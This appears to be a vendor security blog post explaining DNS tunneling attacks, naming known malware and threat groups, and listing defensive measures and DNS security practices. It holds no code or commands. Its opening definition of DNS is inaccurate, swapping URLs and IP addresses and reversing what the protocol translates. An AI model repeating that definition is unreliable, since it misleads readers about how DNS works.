Beware of DNS Tunneling, the Ingenious Cyber Attack.
Before talking about DNS Tunneling it is necessary to remember that the Domain Name System (DNS) is the protocol that translates the Uniform Resource Locator (URLs) (machine-readable IP addresses, such as 199.167.52.137) into human-readable callsigns.
DNS is a fundamental protocol for the internet and is often described as the “address book of the internet” because it maps domain names to IP addresses.
The widespread use of DNS and its limited security controls often allow communication and data exchange outside the protocol's original scope. For this reason, cybercriminals have identified this weak point in the system as a place to conduct malicious activities.
Furthermore, since DNS is not designed as a data transport gateway, many organizations do not monitor DNS traffic for malicious activity, and therefore, various types of attacks use this platform against corporate networks. DNS Tunneling It is one of these attacks.
How DNS Tunneling Works
DNS Tunneling attacks exploit the DNS protocol to inject malware and other data via a client-server model.
- The attacker registers a domain, such as badsite.comThe DNS then contacts this registered server, where a tunneling malware program is installed.
- The attacker infects a computer, often located behind a company's firewall. Since DNS requests are always allowed inside and outside the firewall, the infected computer can send a query to the DNS. The DNS is a server that forwards requests for IP addresses to root servers and top-level domain servers.
- The DNS routes the query to the attacker's command and control server, where the tunneling program is installed. A connection is now established between the victim and the attacker via the DNS resolver. This tunnel can be used to exfiltrate data or for other malicious purposes. Because there is no direct connection between the attacker and the victim, it is more difficult to trace the attacker's computer.
DNS tunneling has been around for nearly 20 years. Both the Morto and Feederbot malware have been used for DNS tunneling. More recent DNS tunneling attacks include those by the DarkHydrus threat group, which targeted government agencies in the Middle East in 2018, and OilRig, which has been operating since 2016 and is still active.
Prevent DNS Tunneling
DNS is a very powerful tool used everywhere, allowing applications and systems to search for resources and services to interact with.
DNS provides a communications foundation that allows more advanced and powerful protocols to function, but it can be overlooked from a security perspective, especially considering how much malware is distributed via email protocols or downloaded from the web using HTTP.
For these reasons, DNS is the perfect choice for adversaries looking for an always-open, overlooked, and underappreciated protocol to exploit for communications to and from compromised hosts.
Organizations can defend themselves against DNS tunneling in various ways, using both Leonardo Networks' network security platform and open source technologies. Defense can take several forms, including, but not limited to, the following:
- Block domain names (or IP addresses or geographic regions) based on known reputation or perceived threat;
- Rules for “strange” DNS queries;
- Rules on the length, type, or size of incoming and outgoing DNS queries;
- Harden client operating systems and understand their name resolution capabilities, as well as their specific search order;
- Analyzing user behavior and/or systems that automatically detect anomalies, such as accessing new domains, especially when the access method and frequency are anomalous;
DNS Security Best Practices
- Train and educate security personnel
Implement a security education and awareness program to train staff to identify malicious threats. Encourage them to take precautions when following links to avoid installing malware. Phishing training can help them recognize, avoid, and report email attacks.
- Implement a threat intelligence program
Understand the threat landscape and implement a threat intelligence program to stay aware of the different types of threats and techniques used by attackers today. With this information, you can ensure you have the right technology to keep your network secure.
- Learn what your DNS data can tell you
Don't just look at DNS traffic. Collecting DNS data logs is of little value if you don't understand what you're looking at. By understanding the data, you can successfully prevent unprecedented DNS threats in your organization.
- Don't delay in managing a DNS resolver
If a DNS server is compromised, it can provide you with false answers to direct your traffic to other compromised systems or enable a man-in-the-middle attack.
- Planning for remote work risk
Develop a remote workforce strategy, as it can put sensitive company data at risk. Warn them not to use unsecured, free, or public Wi-Fi, as adversaries can easily infiltrate between employees and the connection point. Integrate multifactor authentication and prepare for the risk of lost or stolen devices.
- Approaching network security holistically
Take a holistic approach to network security and ensure you have the right capabilities to address various network threat vectors, easily integrated into the entire security stack. When evaluating vendor solutions, it's important to conduct direct comparisons in proof-of-concept. Every environment is different, and independent, neutral DNS-level security testing hasn't yet been established.
- Automate responses, not just alerts
To successfully protect your organization, you need to respond automatically, not just receive alerts. The speed with which attacks are executed makes alerts and signals ineffective. By the time a threat is identified, it may already be too late. Your security team must be able to automatically determine threats and quarantine potentially infected systems before further damage is done. To ensure your organization follows best practices and optimizes its Leonardo Networks DNS Security Service, it is possible to make an assessment of best practices.
Source paloaltonetworks.com
